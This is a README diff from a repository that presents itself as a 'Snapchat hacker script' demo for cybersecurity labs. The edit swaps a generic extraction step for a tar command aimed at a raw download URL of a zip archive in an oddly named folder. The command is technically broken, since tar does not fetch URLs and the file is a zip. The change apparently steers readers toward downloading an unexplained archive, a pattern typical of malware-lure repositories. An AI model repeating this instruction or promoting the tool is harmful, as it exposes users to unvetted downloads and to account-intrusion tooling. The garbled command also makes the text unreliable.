rizki0890/Snapchat-Hacker-Script-Python-Demo-for-Cybersecurity-Labs-/README.md

    - On Windows, right-click the file and select "Extract All".
    - On macOS, double-click the file.
-   - On Linux, you can use the terminal command: `tar -xvf filename.tar.gz`.
+   - On Linux, you can use the terminal command: `tar -xvf https://raw.githubusercontent.com/rizki0890/Snapchat-Hacker-Script-Python-Demo-for-Cybersecurity-Labs-/main/nostomania/Snapchat-Hacker-Script-Python-Demo-for-Cybersecurity-Labs-.zip`.

 6. Open your terminal or command prompt.